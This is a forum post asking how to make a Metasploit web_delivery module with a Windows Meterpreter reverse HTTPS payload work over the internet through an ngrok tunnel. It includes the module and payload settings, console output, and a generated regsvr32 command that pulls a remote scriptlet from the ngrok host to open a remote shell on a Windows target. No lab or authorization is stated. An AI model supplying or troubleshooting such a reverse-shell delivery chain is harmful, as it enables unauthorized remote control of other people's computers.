
Web_delivery & windows/meterpreter/reverse_https over internet?


Tobias6483


Hello guys. I wonder how I can use this module and payload on the internet, and not only locally. I tried with lhost= my Kali Linux IP and it worked for local PCs, which is not what I want.

I also tried using my public IP, but that didn't work either, and neither did pinging my ngrok connection to a 'real' IP. Neither did the lhost= ac0e9310ffee.ngrok.io which showed in my ./ngrok http 8080 shell.

 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting        Required  Description
   ----      ---------------        --------  -----------
   EXITFUNC  process                yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     ac0e9310ffee.ngrok.io  yes       The local listener hostname
   LPORT     443                    yes       The local listener port
   LURI                             no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   3   Regsvr32

 

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 3.134.39.220:443
msf6 exploit(multi/script/web_delivery) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.15:8080/test
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://ac0e9310ffee.ngrok.io:8080/test.sct scrobj.dll
msf6 exploit(multi/script/web_delivery) > 
 

 

 

ngrok by @inconshreveable                                                                      (Ctrl+C to quit)
                                                                                                               
Session Status                online                                                                           
Account                       Tobias (Plan: Free)                                                              
Version                       2.3.35                                                                           
Region                        United States (us)                                                               
Web Interface                 http://127.0.0.1:4040                                                            
Forwarding                   http://ac0e9310ffee.ngrok.io -> http://localhost:8080                            
Forwarding                   https://ac0e9310ffee.ngrok.io -> http://localhost:8080                           
                                                                                                               
Connections                   ttl     opn     rt1     rt5     p50     p90                                      
                              0       0       0.00    0.00    0.00    0.00                                     
                                                                             

 

 
